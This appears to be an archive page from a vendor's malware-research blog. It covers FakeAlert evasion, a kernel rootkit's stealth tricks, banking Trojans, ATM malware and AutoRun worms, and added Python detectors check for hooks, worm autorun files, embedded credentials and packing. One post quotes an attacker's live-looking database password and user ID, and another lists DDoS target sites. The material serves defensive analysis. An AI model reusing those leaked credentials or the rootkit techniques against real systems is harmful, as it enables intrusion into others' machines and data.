Archive for the 'Malware Research' Category

FakeAlerts Uncovered

It has been almost a year since rogue antivirus products, a.k.a. scareware, became rampant. These Trojan families are typically spread via drive-by downloads, SEO poisoning, spam campaigns and clever social engineering.
Having discussed these methods in earlier blogs, today we will look into the protection mechanisms that these FakeAlert Trojan families adopt to evade detection by antivirus vendors.

  • Code obfuscation using junk instructions

In the above screenshot, lots of junk code is visible between valid instructions. Junk instructions are used widely across FakeAlert families.

  • Fake API calls

The screenshot shows a call to the API SetArcDirection, which the code does not need. Malware uses such unnecessary API calls to defeat emulation; sometimes these families also call APIs that don't exist to check whether they are being emulated.

  • Customized packer

Many FakeAlert families use their own custom packers and encryption routines. Some families patch existing packers.

  • Use of XMM and MMX instruction sets

XMM, MMX and FPU instructions that the code does not need, along with the other junk code, are also used by most FakeAlert families.

The techniques discussed above are not very new and have been used in notable malware. But FakeAlert Trojans use these evasion techniques to their full potential with every new variant. Just when we thought we were seeing a decline in adware and spyware, FakeAlert Trojan families have stepped in to claim the scum-of-the-Internet tag.

Generic Rootkit.d Strikes Again in New Variant

A few days ago I got a chance to look at a recent variant of the DNSChanger.ad. It drops a common rootkit that is mostly associated with FakeAlert and DNSChanger Trojans. Over a period of time the dropped sys file names have changed from tdss*.sys to seneka*.sys to skynet*.sys and so on. Our memory detection and cleaning for this rootkit is Generic Rootkit.d. The techniques of this threat are well known now. It basically uses inline hooks on IofCallDriver, IofCompleteRequest, NtFlushInstructionCache, NtEnumerateKey, etc. This Trojan removes permissions from its registry entries as well.

The malware has a hidden sys file in the system32\drivers directory with a name like skynet*.sys. One can use a rootkit analysis tool or just windbg to restore the inline hooks installed by the malware. Even though the malicious file is no longer hidden after hook restoration, the malware can recreate the file after its deletion. It is common for malware to “watch” or recreate its components, but the curious thing was that File Monitor (filemon) did not show any activity, and other API-tracing approaches also didn't point to anything that could explain the rebirth of this file.

Taking a closer look, we found that the malware uses one of the delayed system worker threads to call, at regular intervals, ZwCreateFile in a loop created using KeDelayExecutionThread. The following figure shows the relevant malware code and thread.

Figure 1 File Creation loop

This explains how the file is recreated after its deletion. This thread also watches the malware’s registry. This thread continuously restores the system service descriptor table (SSDT) using the code shown below. So any tracing utility that hooks SSDT to monitor activity would not work.

Figure 2 SSDT rewrite
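
Because the worker thread keeps writing the original pointers back into the SSDT, a tool that only checks the SSDT will see a clean table while the inline hooks on IofCallDriver and friends stay in place. The Python below is an added example, not code from the post or from McAfee: it runs the SSDT range-and-baseline check alongside a check of each routine's first bytes for a JMP out of the kernel image. Every address, service index and byte sequence in it is constructed for illustration.

```python
# Added example (not from the post): two integrity checks a memory-analysis
# tool could run over snapshots of kernel state. All addresses, service
# indices and byte sequences here are constructed, not taken from a real system.

NTOSKRNL_BASE = 0x804D7000   # constructed kernel image base
NTOSKRNL_SIZE = 0x001F0000   # constructed kernel image size

# Constructed clean-boot baseline of a few SSDT entries: service index -> handler.
CLEAN_SSDT = {
    0x25: 0x805B3E5C,   # NtCreateFile (index and address constructed)
    0x47: 0x80613A20,   # NtEnumerateKey
    0x7A: 0x805B0B12,   # NtFlushInstructionCache
    0xAD: 0x80621F44,   # NtQueryDirectoryFile
}

def in_kernel_image(addr, base=NTOSKRNL_BASE, size=NTOSKRNL_SIZE):
    """True if addr lies inside the ntoskrnl image range."""
    return base <= addr < base + size

def find_ssdt_hooks(current, baseline, base=NTOSKRNL_BASE, size=NTOSKRNL_SIZE):
    """Return (index, address, reason) for entries that point outside the
    kernel image or differ from the clean-boot baseline."""
    findings = []
    for idx, addr in sorted(current.items()):
        if not in_kernel_image(addr, base, size):
            findings.append((idx, addr, "outside ntoskrnl image"))
        elif idx in baseline and baseline[idx] != addr:
            findings.append((idx, addr, "differs from clean baseline"))
    return findings

def inline_hook_target(prologue, func_addr):
    """Decode the redirection target if a routine's first bytes are
    JMP rel32 (E9 xx xx xx xx) or PUSH imm32 / RET (68 xx xx xx xx C3)."""
    if len(prologue) >= 5 and prologue[0] == 0xE9:
        rel = int.from_bytes(prologue[1:5], "little", signed=True)
        return (func_addr + 5 + rel) & 0xFFFFFFFF
    if len(prologue) >= 6 and prologue[0] == 0x68 and prologue[5] == 0xC3:
        return int.from_bytes(prologue[1:5], "little")
    return None

def find_inline_hooks(routines, base=NTOSKRNL_BASE, size=NTOSKRNL_SIZE):
    """routines: name -> (address, first bytes). Returns (name, target) for
    every routine whose entry point jumps out of the kernel image."""
    hooked = []
    for name, (addr, prologue) in routines.items():
        target = inline_hook_target(prologue, addr)
        if target is not None and not in_kernel_image(target, base, size):
            hooked.append((name, target))
    return hooked

# Constructed snapshot with a tracing tool's SSDT hook in place ...
TRACER_SSDT = dict(CLEAN_SSDT)
TRACER_SSDT[0x25] = 0xF8A1C3D0
# ... and after the rootkit's worker thread wrote the original pointers back.
RESTORED_SSDT = dict(CLEAN_SSDT)

ROOTKIT_DRIVER_ADDR = 0xF8A1D000   # constructed address inside the hidden driver
IOFCALLDRIVER = 0x804E37D5         # constructed address of IofCallDriver
CLEAN_PROLOGUE = bytes.fromhex("8bff558bec")   # mov edi,edi / push ebp / mov ebp,esp
HOOKED_PROLOGUE = b"\xe9" + (
    (ROOTKIT_DRIVER_ADDR - (IOFCALLDRIVER + 5)) & 0xFFFFFFFF).to_bytes(4, "little")

ROUTINES = {
    "IofCallDriver": (IOFCALLDRIVER, HOOKED_PROLOGUE),
    "IofCompleteRequest": (0x804E3B10, CLEAN_PROLOGUE),
}

if __name__ == "__main__":
    print("SSDT with tracer hook:", find_ssdt_hooks(TRACER_SSDT, CLEAN_SSDT))
    print("SSDT after rootkit restore:", find_ssdt_hooks(RESTORED_SSDT, CLEAN_SSDT))
    print("Inline hooks:", [(n, hex(t)) for n, t in find_inline_hooks(ROUTINES)])
```

The restored table produces no SSDT findings, which is exactly the blind spot the post describes; the inline-hook check still reports IofCallDriver, so a checker should run both.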

If it were just SSDT rewriting, then filemon should have reported the file activity. But the malware also removes all filesystem filter drivers; because filemon also uses a filesystem filter, it didn’t report anything. The figure below shows the device stack before and after infection. Note that all filters are removed after infection.

Figure 3 Device stack before and after infection


And here is the code that removes attached filters.

Figure 4 Detach filter

Actually, only the attached-device field of the NTFS device object is nulled out; the rest of the stack is left dangling.

Figure 3 also shows that not only is the filemon filter driver removed but even the Filter Manager has been effectively removed. Removing all filters and rewriting the SSDT will thwart analysis tools that use these techniques, but may also break other software. Obviously that does not matter to the malware as long as its rootkit works stealthily in most environments. It's a tradeoff that many malware make, and this one has made its choice.
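
The dangling stack leaves a detectable inconsistency: the filters still record what they attached to, but walking up from NTFS no longer reaches them. The Python below is an added example, not the post's own code; it models each device object by the device above it and the device it attached to, reports filters that are no longer reachable from the base filesystem device, and compares the visible stack against a list of filters you expect to be present. All device names are constructed.

```python
import copy

# Added example (not from the post): consistency checks over a model of the
# filesystem device stack. For each device, "attached_device" is the device
# above it (what the I/O manager follows when it dispatches a request) and
# "attached_to" is the device a filter attached itself to. Names are constructed.

def walk_up(stack, base):
    """Follow attached_device pointers from base: the stack the I/O manager sees."""
    chain, seen, cur = [], set(), base
    while cur is not None and cur not in seen:
        seen.add(cur)
        chain.append(cur)
        cur = stack[cur]["attached_device"]
    return chain

def claimed_filters(stack, base):
    """Devices whose attached_to chain leads down to base:
    the stack the filters believe they are part of."""
    result = []
    for name, dev in stack.items():
        cur, seen = dev["attached_to"], set()
        while cur is not None and cur != base and cur not in seen:
            seen.add(cur)
            cur = stack[cur]["attached_to"]
        if cur == base:
            result.append(name)
    return sorted(result)

def find_dangling_filters(stack, base):
    """Filters that think they sit above base but are unreachable from it."""
    visible = set(walk_up(stack, base))
    return [f for f in claimed_filters(stack, base) if f not in visible]

def missing_expected_filters(stack, base, expected):
    """Filters from a known-good inventory that the visible stack lacks."""
    visible = set(walk_up(stack, base))
    return sorted(f for f in expected if f not in visible)

# Constructed stack in the shape of Figure 3: NTFS, the Filter Manager, filemon.
BEFORE_INFECTION = {
    "Ntfs":    {"attached_device": "FltMgr",  "attached_to": None},
    "FltMgr":  {"attached_device": "Filemon", "attached_to": "Ntfs"},
    "Filemon": {"attached_device": None,      "attached_to": "FltMgr"},
}
# After infection only the base device's attached-device field is cleared;
# the filters themselves still point down at the stack they were part of.
AFTER_INFECTION = copy.deepcopy(BEFORE_INFECTION)
AFTER_INFECTION["Ntfs"]["attached_device"] = None

if __name__ == "__main__":
    for label, stack in (("before", BEFORE_INFECTION), ("after", AFTER_INFECTION)):
        print(label, "visible:", walk_up(stack, "Ntfs"),
              "dangling:", find_dangling_filters(stack, "Ntfs"),
              "missing:", missing_expected_filters(stack, "Ntfs", ["FltMgr", "Filemon"]))
```

On a live system the same two checks apply: enumerate the stack from the filesystem device upward, then cross-check against both the filter drivers that are loaded and the inventory of filters the machine is supposed to have.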

Michael Jackson News Affects Web Traffic

The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

More Password-Theft Shenanigans

Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

When run, the password-stealing Trojan queries for the infected host’s IP address using three web-based IP address-lookup services. It then makes a SQL query over TCP to post stolen passwords to a server in China. This is a part of the actual SQL query to log into the malicious SQL server:

Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

mengmeng has been malicious and, what's more, was careless enough to leave his login credentials in the open. Please keep your DATs updated to stay secure!

DDoS Not the Most Political Way to Protest

So, Iran had elections this weekend. Some people don’t agree with the results. As a consequence, some people are organizing DDoS attacks against Iranian websites, more precisely:

http://www.leader.ir/
http://president.ir/
http://www.irib.ir/
http://www.iribnews.ir/

and some specific URLs on those domains.

No guys, that’s not the right path and, as it is a malicious activity, we are detecting the tools being distributed to create this DDoS. In my opinion, I doubt that it would cause much damage, since this looks more like a media thing than a huge DDoS attack. The applications use old techniques and unless there are lots of “followers,” I don’t think that it will cause much impact. We will continue to monitor the situation.

Worms Dig Further Than Thumb Drives

Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

A) Most USB devices that you can plug into your computer that have storage

If you answered A, you’re right! (That wasn’t hard, was it?)

How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

But going down the road to prevention is not the point I'm trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRun worms can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”
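
Since any of these devices can carry an autorun.inf, it helps to know what a worm-planted one looks like before the drive is opened. The Python below is an added example, not code from the post: a tolerant parser for the [autorun] section and a set of heuristics for the entries AutoRun worms rely on (a launch entry pointing at an executable, AutoPlay text that mimics the built-in "Open folder to view files" choice, a folder-style icon borrowed from shell32.dll, and UseAutoPlay=1). Both sample files and the SID-like folder name are constructed.

```python
import os

# Added example (not from the post): parse autorun.inf and explain why it
# looks like worm bait. Samples below are constructed; the folder name under
# RECYCLER is a placeholder, not a real SID.

EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")

def parse_autorun(text):
    """Return key=value entries of the [autorun] section with lowercased keys.
    Tolerates junk lines, ';' comments and odd section-name casing."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def _is_launch_key(key):
    # open= and shellexecute= run on insertion; shell\<verb>\command= runs
    # when the drive is opened or explored from Explorer's context menu.
    return key in ("open", "shellexecute") or (
        key.startswith("shell\\") and key.endswith("\\command"))

def _program_path(value):
    """First token of the command line, honouring a quoted path."""
    if value.startswith('"') and value.count('"') >= 2:
        return value[1:value.index('"', 1)].lower()
    return value.split()[0].lower() if value.split() else ""

def assess_autorun(entries):
    """Return (key, reason) findings for the entries worms depend on."""
    findings = []
    for key, value in entries.items():
        target = value.strip('"').lower()
        if _is_launch_key(key) and _program_path(value).endswith(EXEC_EXT):
            findings.append((key, f"runs {_program_path(value)!r} automatically"))
        elif key == "action" and "open folder" in target:
            findings.append((key, "AutoPlay text mimics the built-in 'Open folder to view files' choice"))
        elif key == "icon" and "shell32.dll" in target:
            findings.append((key, "icon from shell32.dll makes the drive look like a plain folder (heuristic)"))
        elif key == "useautoplay" and target == "1":
            findings.append((key, "forces AutoPlay handling"))
    return findings

def inspect_removable_root(path):
    """Read <path>/autorun.inf if present and return its findings."""
    inf = os.path.join(path, "autorun.inf")
    if not os.path.isfile(inf):
        return []
    with open(inf, "r", encoding="latin-1", errors="replace") as fh:
        return assess_autorun(parse_autorun(fh.read()))

# Constructed sample in the style of an AutoRun worm.
WORM_AUTORUN = r"""
;constructed sample
[AutoRun]
open=RECYCLER\S-1-5-21-EXAMPLE\update.exe
icon=%SystemRoot%\system32\shell32.dll,4
action=Open folder to view files
shell\open\command=RECYCLER\S-1-5-21-EXAMPLE\update.exe
shell\explore\command=RECYCLER\S-1-5-21-EXAMPLE\update.exe
useautoplay=1
"""

# Constructed sample of the harmless kind: a label and an icon, nothing to run.
BENIGN_AUTORUN = r"""
[autorun]
label=Holiday photos
icon=photos.ico
"""

if __name__ == "__main__":
    for key, reason in assess_autorun(parse_autorun(WORM_AUTORUN)):
        print(f"{key}: {reason}")
    print("benign findings:", assess_autorun(parse_autorun(BENIGN_AUTORUN)))
```

A legitimate install CD also carries an open= line, so the launch finding is a reason to look, not a verdict; the durable fix the post hints at is to disable AutoPlay so none of these entries are ever honoured.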

Dumb Malware Authors Cause More Damage Than Smart Ones

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. :) And, yes, we already detect this malware–as PWS-Banker.gen.i.
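
Both this post and the PWS-Banker.gen.de one above turn on the same artifact: an OLE DB connection string, complete with user and password, sitting in the binary as plain text. The Python below is an added example, not code from either post or from McAfee; it finds such strings in a strings dump (ANSI and UTF-16LE), parses the key=value fields, reports whether a password is embedded, and produces a redacted copy safe to put in a report. The sample blob and every host, user and password in it are constructed placeholders.

```python
import re

# Added example (not from the posts): locate OLE DB connection strings in a
# binary blob and report embedded credentials. All sample values are constructed.

CONN_STR_RE = re.compile(
    r"Provider=[^;\x00]+(?:;[^;=\x00]+=[^;\x00]*)+", re.IGNORECASE)
SECRET_RE = re.compile(r"(?i)\b(password|pwd)=[^;]*")

def parse_connection_string(s):
    """Split 'Key=Value;Key=Value' into a dict with lowercased keys."""
    out = {}
    for part in s.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out

def redact(s):
    """Replace the password value so the string can be logged safely."""
    return SECRET_RE.sub(lambda m: m.group(1) + "=***", s)

def _text_views(blob):
    # ANSI strings, plus UTF-16LE strings at both possible byte alignments.
    yield "ansi", blob.decode("latin-1")
    for off in (0, 1):
        yield f"utf16le+{off}", blob[off:].decode("utf-16-le", errors="ignore")

def scan_for_db_credentials(blob):
    """Return one finding per connection string found in the blob."""
    findings = []
    for view, text in _text_views(blob):
        for m in CONN_STR_RE.finditer(text):
            fields = parse_connection_string(m.group(0))
            findings.append({
                "encoding": view,
                "provider": fields.get("provider"),
                "user": fields.get("user id") or fields.get("uid"),
                "data_source": fields.get("data source") or fields.get("server"),
                "password_present": bool(fields.get("password") or fields.get("pwd")),
                "redacted": redact(m.group(0)),
            })
    return findings

# Constructed blob: a fake header, an unrelated SQL string, an ANSI connection
# string, some padding and a UTF-16LE connection string.
_ANSI = (b"Provider=SQLOLEDB.1;Password=s3cr3t-example;Persist Security Info=True;"
         b"User ID=bankuser;Initial Catalog=dump;Data Source=sql.example.invalid;"
         b"Packet Size=10000\x00")
_WIDE = ("Provider=SQLOLEDB.1;User ID=wideuser;Password=p4ss-example;"
         "Data Source=db.example.invalid").encode("utf-16-le") + b"\x00\x00"
SAMPLE_BLOB = (b"MZ\x90\x00" + b"\x00" * 28 + b"SELECT * FROM contas\x00"
               + _ANSI + b"\xcc" * 7 + _WIDE + b"\x00" * 4)

if __name__ == "__main__":
    for f in scan_for_db_credentials(SAMPLE_BLOB):
        print(f["encoding"], f["user"], f["data_source"],
              "password embedded" if f["password_present"] else "no password",
              "->", f["redacted"])
```

The redacted form is what belongs in a write-up; the unredacted credentials go to the hosting provider and law enforcement, which is the responsible way to act on what the author spotted here.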

ATM Malware Makes Withdrawals in Russia

We frequently encounter password stealers and backdoors on computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see such malware installed directly in banks' automated teller machines. In these cases, the Trojans have to be installed by people who have physical access to the machines, and collecting the data and removing the malware would need yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATM machines. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3, The Register also raised public awareness by covering the story.

When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

The attacker can also, through a password-protected routine, control the currency-dispensing ATM cassette:

We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

New McAfee Whitepaper on Browser Attacks

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Social Engineering Aids Malware Delivery

Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:
Bank of America phish
If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the sign “Secure Area” did not complement the nonsecure HTTP URL.

Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading :).
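
The two cues the post points at, a link that merely contains "bankofamerica.com" and a "Secure Area" sign over a plain HTTP URL, can both be checked mechanically before anyone clicks. The Python below is an added example, not code from the post or from SANS: it parses a link, tests whether the host is really under the expected domain (rather than having the brand somewhere else in the URL), and flags a non-HTTPS scheme, a user@host trick and a bare IP address. The sample URLs use constructed .invalid hosts.

```python
from urllib.parse import urlsplit

# Added example (not from the post): classify a link that claims to belong to
# a bank. Sample URLs below are constructed; the real campaign's link is not
# reproduced here.

def host_under(host, domain):
    """True only if host is domain itself or a subdomain of it."""
    host = (host or "").lower().rstrip(".")
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)

def assess_bank_link(url, expected_domain):
    """Return a list of reasons the link should not be trusted (empty = clean)."""
    parts = urlsplit(url.strip())
    host = parts.hostname or ""
    findings = []
    if not host_under(host, expected_domain):
        if expected_domain.lower() in url.lower():
            findings.append(
                f"'{expected_domain}' appears in the URL but the host is '{host}'")
        else:
            findings.append(f"host '{host}' is not under '{expected_domain}'")
    if parts.scheme.lower() != "https":
        findings.append(f"scheme is '{parts.scheme}', not https: no 'secure area' here")
    if parts.username is not None:
        findings.append("userinfo before '@' hides the real host")
    if host and host.replace(".", "").isdigit():
        findings.append("host is a bare IP address")
    return findings

# Constructed links in the styles seen in campaigns like the one above.
SAMPLE_LINKS = [
    "https://www.bankofamerica.com/",                                # genuine shape
    "http://www.bankofamerica.com.example.invalid/update",           # brand as a subdomain
    "http://bankofamerica.com@evil.example.invalid/cert",            # brand as userinfo
    "http://192.0.2.10/bankofamerica.com/update.php",                # brand in the path
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        problems = assess_bank_link(link, "bankofamerica.com")
        print(link, "->", "OK" if not problems else "; ".join(problems))
```

The host test is the one that matters: substring matching is exactly the mistake the lure counts on, and only a suffix match against the registered domain (preceded by a dot) distinguishes a real subdomain from a look-alike.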

McAfee Releases June Spam Report

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

Who Digs the Elephant Trap?

It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine which is which, an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles.

We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake, or that there will be an unpleasant slowdown due to long analysis. Either can cause trouble for users. If you feel that you really must use an obfuscating protector, at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use them if you can avoid it.
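
The reason a packed file costs the scanner cycles is that the packer's envelope is all it can see at first: compressed or encrypted code has near-maximal byte entropy, and the unpacked program only exists in a section that is empty on disk. The Python below is an added example, not code from the post or from McAfee: it computes per-section Shannon entropy and applies three packer heuristics (a known packer section name, a high-entropy executable section, and an executable section with no raw data) to two constructed section tables; it does not parse a real PE header, and the section-name list is illustrative rather than complete.

```python
import math
import random

# Added example (not from the post): entropy-based packer heuristics over a
# simplified section table. Section contents below are constructed.

def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)

# Section names commonly left behind by packers/protectors (illustrative list).
KNOWN_PACKER_SECTIONS = {"upx0", "upx1", "upx2", ".aspack", ".adata",
                         ".petite", ".themida", ".vmp0", ".vmp1"}

def assess_sections(sections, entropy_threshold=7.0):
    """sections: list of dicts with name, raw (bytes), virtual_size, executable.
    Returns (section name, reason) findings suggesting a packed image."""
    findings = []
    for s in sections:
        name, raw = s["name"], s["raw"]
        h = shannon_entropy(raw)
        if name.lower() in KNOWN_PACKER_SECTIONS:
            findings.append((name, "section name associated with a packer"))
        if s["executable"] and raw and h >= entropy_threshold:
            findings.append((name, f"executable section with entropy {h:.2f} "
                                   "(compressed or encrypted code)"))
        if s["executable"] and not raw and s["virtual_size"] > 0:
            findings.append((name, f"executable section with no raw data but "
                                   f"{s['virtual_size']:#x} bytes reserved "
                                   "(unpacking destination)"))
    return findings

def looks_packed(sections):
    return bool(assess_sections(sections))

# Constructed section contents.
_rng = random.Random(2009)
HIGH_ENTROPY = bytes(_rng.getrandbits(8) for _ in range(4096))   # like compressed code
CODE_LIKE = bytes.fromhex("8bff558bec83ec10") * 512               # repetitive x86 prologues
TEXT_LIKE = b"Error loading configuration file\x00" * 128          # ordinary string data

PACKED_SAMPLE = [
    {"name": "UPX0", "raw": b"", "virtual_size": 0x20000, "executable": True},
    {"name": "UPX1", "raw": HIGH_ENTROPY, "virtual_size": 0x1100, "executable": True},
    {"name": ".rsrc", "raw": TEXT_LIKE, "virtual_size": 0x1000, "executable": False},
]
CLEAN_SAMPLE = [
    {"name": ".text", "raw": CODE_LIKE, "virtual_size": 0x1000, "executable": True},
    {"name": ".data", "raw": TEXT_LIKE, "virtual_size": 0x1000, "executable": False},
    {"name": ".bss", "raw": b"", "virtual_size": 0x4000, "executable": False},
]

if __name__ == "__main__":
    for label, table in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, looks_packed(table))
        for name, reason in assess_sections(table):
            print("  ", name, reason)
```

High entropy alone is not proof of packing (resources and certificates are high-entropy too), which is why the heuristic only weighs it for executable sections; and none of this tells a scanner whether the payload is a game or a spam-bot, which is the cost the post is describing.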

Double Strike by AMTSO

